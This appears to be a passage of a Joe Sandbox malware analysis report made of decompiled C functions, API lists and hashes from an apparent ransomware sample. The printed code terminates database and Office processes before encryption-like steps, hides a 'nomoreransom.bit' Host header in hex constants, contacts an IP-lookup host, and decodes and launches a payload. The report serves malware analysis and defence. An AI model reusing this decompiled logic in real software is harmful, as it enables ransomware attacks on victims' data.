                                      • VirtualFree.KERNEL32(?,00000000,00008000), ref: 00405BD1
                                      • VirtualFree.KERNEL32(?,00000000,00008000), ref: 00405BF6
                                      • VirtualFree.KERNEL32(?,00000000,00008000), ref: 00405C03
                                      • VirtualFree.KERNEL32(?,00000000,00008000), ref: 00405C10
                                      • VirtualFree.KERNEL32(?,00000000,00008000), ref: 00405C2A
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.561857289.0000000000402000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000001.00000002.561847780.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.561896409.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.561907295.000000000040E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.561999886.0000000000414000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_400000_9gkAKTWOXp.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: lstrlen$Virtual$Alloc$Free$lstrcat$BinaryByteCharCryptMultiStringWide$Name_memset$CloseComputerErrorHeapLastOpenProcessQueryUserValuewsprintf
                                      • String ID: #shasj$&priv_key=$&pub_key=$&version=2.1$action=call&
                                      • API String ID: 2781787645-879081296
                                      • Opcode ID: 2c772f64fd6f4d627e6b6cfa08910f6e4e47b14889520a2747ee6ef2705b858b
                                      • Instruction ID: 3a474d479e6cb3117948b119d777232bcba310bd2a7d749a27062e74eb6ba077
                                      • Opcode Fuzzy Hash: 2c772f64fd6f4d627e6b6cfa08910f6e4e47b14889520a2747ee6ef2705b858b
                                      • Instruction Fuzzy Hash: CEE18C71608301AFE710DF25CC85B6BBBE5EB88754F00492EF585A72A0D774AD05CFAA
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Control-flow Graph

                                      • Executed
                                      • Not Executed
                                      control_flow_graph 230 404640-4047d6 CreateToolhelp32Snapshot VirtualAlloc 231 4047d8-4047e1 230->231 232 4047eb-4047f1 230->232 231->232 233 4047e3-4047e5 Process32FirstW 231->233 234 4047f4-4047f6 232->234 233->232 235 404800-40480d lstrcmpiW 234->235 236 40483b-404842 235->236 237 40480f-40481f OpenProcess 235->237 236->235 240 404844-404855 Process32NextW 236->240 238 404821-404833 TerminateProcess CloseHandle 237->238 239 404835 237->239 238->236 239->236 240->234 241 404857-404859 240->241 242 404869-404872 FindCloseChangeNotification 241->242 243 40485b-404863 VirtualFree 241->243 243->242
                                      C-Code - Quality: 98%
                                      			E00404640() {
                                      				char* _v12;
                                      				char* _v16;
                                      				char* _v20;
                                      				char* _v24;
                                      				char* _v28;
                                      				char* _v32;
                                      				char* _v36;
                                      				char* _v40;
                                      				char* _v44;
                                      				char* _v48;
                                      				char* _v52;
                                      				char* _v56;
                                      				char* _v60;
                                      				char* _v64;
                                      				char* _v68;
                                      				char* _v72;
                                      				char* _v76;
                                      				char* _v80;
                                      				char* _v84;
                                      				char* _v88;
                                      				char* _v92;
                                      				char* _v96;
                                      				char* _v100;
                                      				char* _v104;
                                      				char* _v108;
                                      				char* _v112;
                                      				char* _v116;
                                      				char* _v120;
                                      				char* _v124;
                                      				char* _v128;
                                      				char* _v132;
                                      				char* _v136;
                                      				char* _v140;
                                      				char* _v144;
                                      				char* _v148;
                                      				char* _v152;
                                      				char* _v156;
                                      				char* _v160;
                                      				char* _v164;
                                      				void* _v172;
                                      				void* _t49;
                                      				void* _t50;
                                      				int _t51;
                                      				int _t52;
                                      				int _t53;
                                      				void* _t60;
                                      				WCHAR* _t62;
                                      				void* _t65;
                                      				void* _t70;
                                      				signed int _t71;
                                      				void* _t72;
                                      				signed int _t74;
                                      				void* _t76;
                                      
                                      				_t76 = (_t74 & 0xfffffff8) - 0xa4;
                                      				_v164 = L"msftesql.exe";
                                      				_v160 = L"sqlagent.exe";
                                      				_v156 = L"sqlbrowser.exe";
                                      				_v152 = L"sqlservr.exe";
                                      				_v148 = L"sqlwriter.exe";
                                      				_v144 = L"oracle.exe";
                                      				_v140 = L"ocssd.exe";
                                      				_v136 = L"dbsnmp.exe";
                                      				_v132 = L"synctime.exe";
                                      				_v128 = L"mydesktopqos.exe";
                                      				_v124 = L"agntsvc.exeisqlplussvc.exe";
                                      				_v120 = L"xfssvccon.exe";
                                      				_v116 = L"mydesktopservice.exe";
                                      				_v112 = L"ocautoupds.exe";
                                      				_v108 = L"agntsvc.exeagntsvc.exe";
                                      				_v104 = L"agntsvc.exeencsvc.exe";
                                      				_v100 = L"firefoxconfig.exe";
                                      				_v96 = L"tbirdconfig.exe";
                                      				_v92 = L"ocomm.exe";
                                      				_v88 = L"mysqld.exe";
                                      				_v84 = L"mysqld-nt.exe";
                                      				_v80 = L"mysqld-opt.exe";
                                      				_v76 = L"dbeng50.exe";
                                      				_v72 = L"sqbcoreservice.exe";
                                      				_v68 = L"excel.exe";
                                      				_v64 = L"infopath.exe";
                                      				_v60 = L"msaccess.exe";
                                      				_v56 = L"mspub.exe";
                                      				_v52 = L"onenote.exe";
                                      				_v48 = L"outlook.exe";
                                      				_v44 = L"powerpnt.exe";
                                      				_v40 = L"steam.exe";
                                      				_v36 = L"sqlservr.exe";
                                      				_v32 = L"thebat.exe";
                                      				_v28 = L"thebat64.exe";
                                      				_v24 = L"thunderbird.exe";
                                      				_v20 = L"visio.exe";
                                      				_v16 = L"winword.exe";
                                      				_v12 = L"wordpad.exe";
                                      				_t49 = CreateToolhelp32Snapshot(2, 0); // executed
                                      				_t70 = _t49;
                                      				_v172 = _t70;
                                      				_t50 = VirtualAlloc(0, 0x22c, 0x3000, 4); // executed
                                      				_t60 = _t50;
                                      				if(_t60 != 0) {
                                      					 *_t60 = 0x22c;
                                      					if(_t70 != 0xffffffff) {
                                      						_push(_t60);
                                      						Process32FirstW(_t70); // executed
                                      					}
                                      				}
                                      				_t41 = _t60 + 0x24; // 0x24
                                      				_t62 = _t41;
                                      				do {
                                      					_t71 = 0;
                                      					do {
                                      						_t51 = lstrcmpiW( *(_t76 + 0x14 + _t71 * 4), _t62);
                                      						if(_t51 == 0) {
                                      							_t65 = OpenProcess(1, _t51,  *(_t60 + 8));
                                      							if(_t65 != 0) {
                                      								TerminateProcess(_t65, 0);
                                      								CloseHandle(_t65);
                                      							}
                                      						}
                                      						_t71 = _t71 + 1;
                                      						_t46 = _t60 + 0x24; // 0x24
                                      						_t62 = _t46;
                                      					} while (_t71 < 0x27);
                                      					_t72 = _v172;
                                      					_t52 = Process32NextW(_t72, _t60);
                                      					_t48 = _t60 + 0x24; // 0x24
                                      					_t62 = _t48;
                                      				} while (_t52 != 0);
                                      				if(_t60 != 0) {
                                      					VirtualFree(_t60, 0, 0x8000); // executed
                                      				}
                                      				_t53 = FindCloseChangeNotification(_t72); // executed
                                      				return _t53;
                                      			}
























































                                      0x00404646
                                      0x00404653
                                      0x0040465b
                                      0x00404663
                                      0x0040466b
                                      0x00404673
                                      0x0040467b
                                      0x00404683
                                      0x0040468b
                                      0x00404693
                                      0x0040469b
                                      0x004046a3
                                      0x004046ab
                                      0x004046b3
                                      0x004046bb
                                      0x004046c3
                                      0x004046cb
                                      0x004046d3
                                      0x004046db
                                      0x004046e3
                                      0x004046eb
                                      0x004046f3
                                      0x004046fb
                                      0x00404703
                                      0x0040470b
                                      0x00404713
                                      0x0040471b
                                      0x00404723
                                      0x0040472e
                                      0x00404739
                                      0x00404744
                                      0x0040474f
                                      0x0040475a
                                      0x00404765
                                      0x00404770
                                      0x0040477b
                                      0x00404786
                                      0x00404791
                                      0x0040479c
                                      0x004047a7
                                      0x004047b2
                                      0x004047c4
                                      0x004047c8
                                      0x004047cc
                                      0x004047d2
                                      0x004047d6
                                      0x004047d8
                                      0x004047e1
                                      0x004047e3
                                      0x004047e5
                                      0x004047e5
                                      0x004047e1
                                      0x004047f1
                                      0x004047f1
                                      0x004047f4
                                      0x004047f4
                                      0x00404800
                                      0x00404805
                                      0x0040480d
                                      0x0040481b
                                      0x0040481f
                                      0x00404824
                                      0x00404831
                                      0x00404831
                                      0x0040481f
                                      0x0040483b
                                      0x0040483c
                                      0x0040483c
                                      0x0040483f
                                      0x00404844
                                      0x0040484a
                                      0x00404850
                                      0x00404850
                                      0x00404853
                                      0x00404859
                                      0x00404863
                                      0x00404863
                                      0x0040486a
                                      0x00404872

                                      APIs
                                      • CreateToolhelp32Snapshot.KERNEL32 ref: 004047B2
                                      • VirtualAlloc.KERNEL32(00000000,0000022C,00003000,00000004), ref: 004047CC
                                      • Process32FirstW.KERNEL32(00000000,00000000), ref: 004047E5
                                      • lstrcmpiW.KERNEL32(00000002,00000024), ref: 00404805
                                      • OpenProcess.KERNEL32(00000001,00000000,?), ref: 00404815
                                      • TerminateProcess.KERNEL32(00000000,00000000), ref: 00404824
                                      • CloseHandle.KERNEL32(00000000), ref: 00404831
                                      • Process32NextW.KERNEL32(?,00000000), ref: 0040484A
                                      • VirtualFree.KERNELBASE(00000000,00000000,00008000), ref: 00404863
                                      • FindCloseChangeNotification.KERNEL32(?), ref: 0040486A
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.561857289.0000000000402000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000001.00000002.561847780.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.561896409.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.561907295.000000000040E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.561999886.0000000000414000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_400000_9gkAKTWOXp.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: CloseProcessProcess32Virtual$AllocChangeCreateFindFirstFreeHandleNextNotificationOpenSnapshotTerminateToolhelp32lstrcmpi
                                      • String ID: @$(@$0@$8@$<@$@@$L@$P@$X@$\@$\@$`@$l@$l@$x@$x@$@
                                      • API String ID: 3023235786-3725814736
                                      • Opcode ID: 9888b97dcf90e8f6efa24b4065dea21d40555a31716fc4df83624dfcfe3835c8
                                      • Instruction ID: 5199461c7d7482eac4530f3025dd1142b0b19823d44abf373f40a8b8b0f494f1
                                      • Opcode Fuzzy Hash: 9888b97dcf90e8f6efa24b4065dea21d40555a31716fc4df83624dfcfe3835c8
                                      • Instruction Fuzzy Hash: 41515CB51083409FE7209F12994874BBBE4ABC5708F508D3EE6943B2D1D7B88819CF9E
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Control-flow Graph

                                      C-Code - Quality: 100%
                                      			E00407A00(void* __ecx, long _a4, intOrPtr _a8, void* _a12, long _a16, void* _a20, intOrPtr _a24, WCHAR* _a36, WCHAR* _a40, long _a44) {
                                      				long _v8;
                                      				void* _v12;
                                      				void* _v16;
                                      				short _v20;
                                      				intOrPtr _v24;
                                      				intOrPtr _v28;
                                      				intOrPtr _v32;
                                      				intOrPtr _v36;
                                      				intOrPtr _v40;
                                      				intOrPtr _v44;
                                      				intOrPtr _v48;
                                      				intOrPtr _v52;
                                      				intOrPtr _v56;
                                      				intOrPtr _v60;
                                      				short _v64;
                                      				void* _t38;
                                      				void* _t40;
                                      				WCHAR* _t41;
                                      				long _t55;
                                      				long _t60;
                                      				WCHAR* _t63;
                                      				void* _t64;
                                      				void* _t65;
                                      				void* _t66;
                                      				void* _t68;
                                      
                                      				_t65 = __ecx;
                                      				_t38 =  *(__ecx + 4);
                                      				if(_t38 != 0) {
                                      					InternetCloseHandle(_t38);
                                      				}
                                      				E004077F0(_t65); // executed
                                      				_t40 = InternetConnectW( *(_t65 + 4), _a4, 0x50, 0, 0, 3, 0, 0); // executed
                                      				_t66 = _t40;
                                      				_v8 = 0;
                                      				_v12 = _t66;
                                      				if(_t66 != 0) {
                                      					_t41 = VirtualAlloc(0, 0x2800, 0x3000, 0x40); // executed
                                      					_t63 = _t41;
                                      					_v16 = _t63;
                                      					wsprintfW(_t63, L"%s", _a8);
                                      					_t64 = HttpOpenRequestW(_t66, _a36, _t63, L"HTTP/1.1", 0, 0, 0x8404f700, 0);
                                      					if(_t64 != 0) {
                                      						_v64 = 0x6f0048;
                                      						_v20 = 0;
                                      						_v60 = 0x740073;
                                      						_v56 = 0x20003a;
                                      						_v52 = 0x6f006e;
                                      						_v48 = 0x6f006d;
                                      						_v44 = 0x650072;
                                      						_v40 = 0x610072;
                                      						_v36 = 0x73006e;
                                      						_v32 = 0x6d006f;
                                      						_v28 = 0x62002e;
                                      						_v24 = 0x740069;
                                      						if(HttpAddRequestHeadersW(_t64,  &_v64, 0xffffffff, 0) != 0) {
                                      							if(HttpSendRequestW(_t64, _a40, _a44, _a12, _a16) == 0) {
                                      								GetLastError();
                                      							} else {
                                      								_t68 = _a20;
                                      								_t60 = _a24 - 1;
                                      								_a4 = 0;
                                      								if(InternetReadFile(_t64, _t68, _t60,  &_a4) != 0) {
                                      									while(1) {
                                      										_t55 = _a4;
                                      										if(_t55 == 0) {
                                      											goto L13;
                                      										}
                                      										 *((char*)(_t55 + _t68)) = 0;
                                      										_a4 = 0;
                                      										_v8 = 1;
                                      										if(InternetReadFile(_t64, _t68, _t60,  &_a4) != 0) {
                                      											continue;
                                      										} else {
                                      										}
                                      										goto L13;
                                      									}
                                      								}
                                      							}
                                      						}
                                      					}
                                      					L13:
                                      					InternetCloseHandle(_t64); // executed
                                      					InternetCloseHandle(_v12);
                                      					VirtualFree(_v16, 0, 0x8000); // executed
                                      					return _v8;
                                      				} else {
                                      					return _t40;
                                      				}
                                      			}




























                                      0x00407a08
                                      0x00407a0b
                                      0x00407a10
                                      0x00407a13
                                      0x00407a13
                                      0x00407a1b
                                      0x00407a32
                                      0x00407a38
                                      0x00407a3a
                                      0x00407a41
                                      0x00407a46
                                      0x00407a5f
                                      0x00407a68
                                      0x00407a70
                                      0x00407a73
                                      0x00407a97
                                      0x00407a9b
                                      0x00407aa3
                                      0x00407aab
                                      0x00407ab6
                                      0x00407abd
                                      0x00407ac4
                                      0x00407acb
                                      0x00407ad2
                                      0x00407ad9
                                      0x00407ae0
                                      0x00407ae7
                                      0x00407aee
                                      0x00407af5
                                      0x00407b04
                                      0x00407b1b
                                      0x00407b6c
                                      0x00407b1d
                                      0x00407b23
                                      0x00407b26
                                      0x00407b2b
                                      0x00407b3a
                                      0x00407b40
                                      0x00407b40
                                      0x00407b45
                                      0x00000000
                                      0x00000000
                                      0x00407b47
                                      0x00407b52
                                      0x00407b59
                                      0x00407b68
                                      0x00000000
                                      0x00000000
                                      0x00407b6a
                                      0x00000000
                                      0x00407b68
                                      0x00407b40
                                      0x00407b3a
                                      0x00407b1b
                                      0x00407b04
                                      0x00407b72
                                      0x00407b79
                                      0x00407b7e
                                      0x00407b8a
                                      0x00407b99
                                      0x00407a4e
                                      0x00407a4e
                                      0x00407a4e

                                      APIs
                                      • InternetCloseHandle.WININET(?), ref: 00407A13
                                      • InternetConnectW.WININET(?,00000000,00000050,00000000,00000000,00000003,00000000,00000000), ref: 00407A32
                                      • VirtualAlloc.KERNEL32(00000000,00002800,00003000,00000040,?,?,?,?,?,?,?,?,00406946,ipv4bot.whatismyipaddress.com,004103B0,00000000), ref: 00407A5F
                                      • wsprintfW.USER32 ref: 00407A73
                                      • HttpOpenRequestW.WININET(00000000,?,00000000,HTTP/1.1,00000000,00000000,8404F700,00000000), ref: 00407A91
                                      • HttpAddRequestHeadersW.WININET(00000000,006F0048,000000FF,00000000), ref: 00407AFC
                                      • HttpSendRequestW.WININET(00000000,006F006D,006F006E,00000000,00740069), ref: 00407B13
                                      • InternetReadFile.WININET(00000000,0062002E,006D006E,00000000), ref: 00407B32
                                      • InternetReadFile.WININET(00000000,0062002E,006D006E,00000000), ref: 00407B60
                                      • GetLastError.KERNEL32 ref: 00407B6C
                                      • InternetCloseHandle.WININET(00000000), ref: 00407B79
                                      • InternetCloseHandle.WININET(00000000), ref: 00407B7E
                                      • VirtualFree.KERNELBASE(00000000,00000000,00008000,?,?,?,?,?,?,?,?,?,?,?,00406946,ipv4bot.whatismyipaddress.com), ref: 00407B8A
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.561857289.0000000000402000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000001.00000002.561847780.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.561896409.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.561907295.000000000040E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.561999886.0000000000414000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_400000_9gkAKTWOXp.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: Internet$CloseHandleHttpRequest$FileReadVirtual$AllocConnectErrorFreeHeadersLastOpenSendwsprintf
                                      • String ID: .$:$Fi@$H$HTTP/1.1$i$m$n$n$o$r$r$s
                                      • API String ID: 3906118045-996335725
                                      • Opcode ID: c8dddac5ca2f289de5ab4859de8dc5ee87e9a581b745c866a59695c1e2178a40
                                      • Instruction ID: 138ab0025d8835c4ee6cf1b85085083e902cc9d23406ca5e2eb97d724ccf74a6
                                      • Opcode Fuzzy Hash: c8dddac5ca2f289de5ab4859de8dc5ee87e9a581b745c866a59695c1e2178a40
                                      • Instruction Fuzzy Hash: AD418371A00209BBEB109F51DD49FDE7FB9FF04754F10402AFA04BA2A1C7B5A950CBA9
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Control-flow Graph

                                      C-Code - Quality: 100%
                                      			E004048A0(void* __ecx) {
                                      				void* _v8;
                                      				CHAR* _v12;
                                      				int _v16;
                                      				void* _v20;
                                      				void* _v24;
                                      				void* _v28;
                                      				void* _v32;
                                      				void* _v36;
                                      				void* _v40;
                                      				int _v44;
                                      				int _v48;
                                      				void* _v52;
                                      				char _v72;
                                      				void* _t50;
                                      				void* _t51;
                                      				int _t75;
                                      				void* _t77;
                                      				short* _t98;
                                      				void* _t102;
                                      
                                      				_t82 = __ecx;
                                      				Sleep(0x3e8); // executed
                                      				_t50 = E00404550(_t82); // executed
                                      				if(_t50 != 0) {
                                      					ExitProcess(0);
                                      				}
                                      				_t51 = CreateThread(0, 0, E00402D30, 0, 0, 0); // executed
                                      				_v8 = _t51;
                                      				if(_v8 != 0) {
                                      					if(WaitForSingleObject(_v8, 0x1388) == 0x102) {
                                      						_t82 = _v8;
                                      						TerminateThread(_v8, 0);
                                      					}
                                      					CloseHandle(_v8); // executed
                                      				}
                                      				E00404640(); // executed
                                      				E004040A0(_t82);
                                      				E00405EF0( &_v72); // executed
                                      				_v36 = 0;
                                      				_v32 = 0;
                                      				_v24 = 0;
                                      				_v40 = 0;
                                      				_t97 =  &_v40;
                                      				E00405EA0( &_v72,  &_v24,  &_v40,  &_v36,  &_v32);
                                      				_v44 = 0;
                                      				_v12 = 0;
                                      				if(E00404880(_v24) != 0) {
                                      					ExitProcess(0);
                                      				}
                                      				L8:
                                      				while(_v44 == 0) {
                                      					_t97 = _v40;
                                      					_t77 = E00405750(_v24, _v40, _v36, _v32,  &_v12); // executed
                                      					_t102 = _t102 + 0xc;
                                      					if(_t77 != 0) {
                                      						_v44 = 1;
                                      					} else {
                                      						Sleep(0x2710);
                                      					}
                                      				}
                                      				E00405E60( &_v72);
                                      				_v28 = 0;
                                      				_v16 = 0;
                                      				_v48 = 0;
                                      				_v52 = 0;
                                      				__eflags = _v12;
                                      				if(_v12 != 0) {
                                      					_v16 = lstrlenA(_v12);
                                      					_v28 = VirtualAlloc(0, _v16, 0x3000, 4);
                                      					_t97 = _v12;
                                      					_t75 = CryptStringToBinaryA(_v12, 0, 1, _v28,  &_v16, 0, 0);
                                      					__eflags = _t75;
                                      					if(_t75 == 0) {
                                      						ExitProcess(0);
                                      					}
                                      					_v48 = 1;
                                      				}
                                      				E00403FF0();
                                      				InitializeCriticalSection(0x412ae8);
                                      				__eflags = _v48;
                                      				if(__eflags == 0) {
                                      					E00403DE0( &_v72);
                                      				} else {
                                      					_t97 = _v16;
                                      					E00403FC0(_v28, _v16, __eflags);
                                      				}
                                      				DeleteCriticalSection(0x412ae8);
                                      				__eflags = E00403A60();
                                      				if(__eflags != 0) {
                                      					E00404330(__eflags);
                                      				}
                                      				_v20 = VirtualAlloc(0, 0x200, 0x3000, 4);
                                      				__eflags = _v20;
                                      				if(__eflags != 0) {
                                      					GetModuleFileNameW(0, _v20, 0x100);
                                      					E00403BA0(_v20, _t97, __eflags);
                                      					VirtualFree(_v20, 0, 0x8000);
                                      				}
                                      				__eflags =  *0x412ae4;
                                      				if( *0x412ae4 != 0) {
                                      					_t98 =  *0x412ae4; // 0x8d0000
                                      					ShellExecuteW(0, L"open", _t98, 0, 0, 5);
                                      				}
                                      				return E00405FC0( &_v72);
                                      				goto L8;
                                      			}






















                                      0x004048a0
                                      0x004048ab
                                      0x004048b1
                                      0x004048b8
                                      0x004048bc
                                      0x004048bc
                                      0x004048d1
                                      0x004048d7
                                      0x004048de
                                      0x004048f4
                                      0x004048f8
                                      0x004048fc
                                      0x004048fc
                                      0x00404906
                                      0x00404906
                                      0x0040490c
                                      0x00404911
                                      0x00404919
                                      0x0040491e
                                      0x00404925
                                      0x0040492c
                                      0x00404933
                                      0x00404942
                                      0x0040494d
                                      0x00404952
                                      0x00404959
                                      0x0040496a
                                      0x0040496e
                                      0x0040496e
                                      0x00000000
                                      0x00404974
                                      0x00404986
                                      0x0040498c
                                      0x00404991
                                      0x00404996
                                      0x004049a5
                                      0x00404998
                                      0x0040499d
                                      0x0040499d
                                      0x004049ac
                                      0x004049b1
                                      0x004049b6
                                      0x004049bd
                                      0x004049c4
                                      0x004049cb
                                      0x004049d2
                                      0x004049d6
                                      0x004049e2
                                      0x004049f8
                                      0x00404a0b
                                      0x00404a0f
                                      0x00404a15
                                      0x00404a17
                                      0x00404a1b
                                      0x00404a1b
                                      0x00404a21
                                      0x00404a21
                                      0x00404a28
                                      0x00404a32
                                      0x00404a38
                                      0x00404a3c
                                      0x00404a4e
                                      0x00404a3e
                                      0x00404a3e
                                      0x00404a44
                                      0x00404a44
                                      0x00404a58
                                      0x00404a63
                                      0x00404a65
                                      0x00404a67
                                      0x00404a67
                                      0x00404a80
                                      0x00404a83
                                      0x00404a87
                                      0x00404a94
                                      0x00404a9d
                                      0x00404aad
                                      0x00404aad
                                      0x00404ab3
                                      0x00404aba
                                      0x00404ac2
                                      0x00404ad0
                                      0x00404ad0
                                      0x00404ae1
                                      0x00000000

                                      APIs
                                      • Sleep.KERNEL32(000003E8), ref: 004048AB
                                        • Part of subcall function 00404550: VirtualAlloc.KERNEL32(00000000,?,00003000,00000040,00000000,?,00000000,00000000,?,00000000), ref: 004045AC
                                        • Part of subcall function 00404550: lstrcpyW.KERNEL32 ref: 004045CF
                                        • Part of subcall function 00404550: lstrlenW.KERNEL32(00000000,?,00003000,00000040,00000000,?,00000000,00000000,?,00000000), ref: 004045D6
                                        • Part of subcall function 00404550: CreateMutexW.KERNEL32(00000000,00000000,00000000,00000000,?,00003000,00000040,00000000,?,00000000,00000000,?,00000000), ref: 004045EE
                                        • Part of subcall function 00404550: GetLastError.KERNEL32(?,00003000,00000040,00000000,?,00000000,00000000,?,00000000), ref: 004045FA
                                        • Part of subcall function 00404550: GetLastError.KERNEL32(?,00003000,00000040,00000000,?,00000000,00000000,?,00000000), ref: 00404601
                                        • Part of subcall function 00404550: VirtualFree.KERNELBASE(00000000,00000000,00008000,?,00003000,00000040,00000000,?,00000000,00000000,?,00000000), ref: 0040461B
                                      • ExitProcess.KERNEL32 ref: 004048BC
                                      • CreateThread.KERNEL32 ref: 004048D1
                                      • WaitForSingleObject.KERNEL32(00000000,00001388), ref: 004048E9
                                      • TerminateThread.KERNEL32(00000000,00000000), ref: 004048FC
                                      • CloseHandle.KERNEL32(00000000), ref: 00404906
                                      • ExitProcess.KERNEL32 ref: 0040496E
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.561857289.0000000000402000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000001.00000002.561847780.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.561896409.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.561907295.000000000040E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.561999886.0000000000414000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_400000_9gkAKTWOXp.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: CreateErrorExitLastProcessThreadVirtual$AllocCloseFreeHandleMutexObjectSingleSleepTerminateWaitlstrcpylstrlen
                                      • String ID: open
                                      • API String ID: 3160775492-2758837156
                                      • Opcode ID: 2adaf577edfec1f8d3a4591ce7ab69e68017f846f83df95990bf0665a8258e38
                                      • Instruction ID: 2fe3139fa9bd6d9f2b7618e63861a0a4b2c33c0f11c60c5fb30394d5f0607533
                                      • Opcode Fuzzy Hash: 2adaf577edfec1f8d3a4591ce7ab69e68017f846f83df95990bf0665a8258e38
                                      • Instruction Fuzzy Hash: FD612CB0A40209ABEB14EFA1DD4ABEF7774AB84705F104029F601BA2D1DBB85E45CF59
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      C-Code - Quality: 66%
                                      			E00407C60(intOrPtr __ecx, void* __edx) {
                                      				long* _v8;
                                      				intOrPtr _v12;
                                      				signed int _v16;
                                      				char _v20;
                                      				intOrPtr _v24;
                                      				intOrPtr _v28;
                                      				char _v32;
                                      				char _v34;
                                      				short _v36;
                                      				intOrPtr _v40;
                                      				intOrPtr _v44;
                                      				char _v48;
                                      				long** _t37;
                                      				void* _t40;
                                      				struct HINSTANCE__* _t45;
                                      				_Unknown_base(*)()* _t46;
                                      				signed int _t54;
                                      				long _t55;
                                      				intOrPtr _t56;
                                      				signed int _t58;
                                      				signed int _t60;
                                      				void* _t63;
                                      				void* _t64;
                                      				void* _t65;
                                      
                                      				_t54 = 0;
                                      				_v12 = __ecx;
                                      				_t37 =  &_v8;
                                      				_t63 = __edx;
                                      				__imp__CryptAcquireContextW(_t37, 0, 0, 1, 0xf0000000); // executed
                                      				if(_t37 == 0) {
                                      					L15:
                                      					return _t54;
                                      				} else {
                                      					_t58 = 0;
                                      					do {
                                      						_t3 = _t58 + 0x61; // 0x61
                                      						 *((short*)(_t65 + _t58 * 2 - 0x64)) = _t3;
                                      						_t58 = _t58 + 1;
                                      					} while (_t58 < 0x1a);
                                      					_t7 = _t63 + 1; // 0x1
                                      					_t55 = _t7;
                                      					_t40 = VirtualAlloc(0, _t55, 0x3000, 0x40); // executed
                                      					_t64 = _t40;
                                      					if(_t64 == 0 || _t63 >= _t55) {
                                      						CryptReleaseContext(_v8, 0);
                                      						VirtualFree(_t64, 0, 0x8000);
                                      						return 0;
                                      					} else {
                                      						_v48 = 0x70797243;
                                      						_v44 = 0x6e654774;
                                      						_v40 = 0x646e6152;
                                      						_v36 = 0x6d6f;
                                      						_v34 = 0;
                                      						_v32 = 0x61766441;
                                      						_v28 = 0x32336970;
                                      						_v24 = 0x6c6c642e;
                                      						_v20 = 0;
                                      						_t45 = GetModuleHandleA( &_v32);
                                      						if(_t45 != 0) {
                                      							L7:
                                      							_t19 =  &_v48; // 0x70797243
                                      							_t46 = GetProcAddress(_t45, _t19);
                                      							if(_t46 == 0) {
                                      								goto L13;
                                      							} else {
                                      								_push(_t64);
                                      								_push(_t63);
                                      								_push(_v8);
                                      								if( *_t46() == 0) {
                                      									goto L13;
                                      								} else {
                                      									_t60 = 0;
                                      									if(_t63 != 0) {
                                      										_t56 = _v12;
                                      										_v16 = 0x1a;
                                      										do {
                                      											asm("cdq");
                                      											 *((short*)(_t56 + _t60 * 2)) =  *((intOrPtr*)(_t65 + ( *(_t64 + _t60) & 0x000000ff) % _v16 * 2 - 0x64));
                                      											_t60 = _t60 + 1;
                                      										} while (_t60 < _t63);
                                      									}
                                      									_t54 = 1;
                                      								}
                                      							}
                                      						} else {
                                      							_t18 =  &_v32; // 0x61766441
                                      							_t45 = LoadLibraryA(_t18);
                                      							if(_t45 == 0) {
                                      								L13:
                                      								_t54 = 0;
                                      							} else {
                                      								goto L7;
                                      							}
                                      						}
                                      						CryptReleaseContext(_v8, 0);
                                      						VirtualFree(_t64, 0, 0x8000); // executed
                                      						goto L15;
                                      					}
                                      				}
                                      			}



























                                      0x00407c70
                                      0x00407c72
                                      0x00407c77
                                      0x00407c7a
                                      0x00407c7d
                                      0x00407c85
                                      0x00407d79
                                      0x00407d81
                                      0x00407c8b
                                      0x00407c8b
                                      0x00407c90
                                      0x00407c90
                                      0x00407c93
                                      0x00407c98
                                      0x00407c99
                                      0x00407ca5
                                      0x00407ca5
                                      0x00407cab
                                      0x00407cb1
                                      0x00407cb5
                                      0x00407d87
                                      0x00407d95
                                      0x00407da3
                                      0x00407cc3
                                      0x00407cc6
                                      0x00407cce
                                      0x00407cd5
                                      0x00407cdc
                                      0x00407ce2
                                      0x00407ce6
                                      0x00407ced
                                      0x00407cf4
                                      0x00407cfb
                                      0x00407cff
                                      0x00407d07
                                      0x00407d17
                                      0x00407d17
                                      0x00407d1c
                                      0x00407d24
                                      0x00000000
                                      0x00407d26
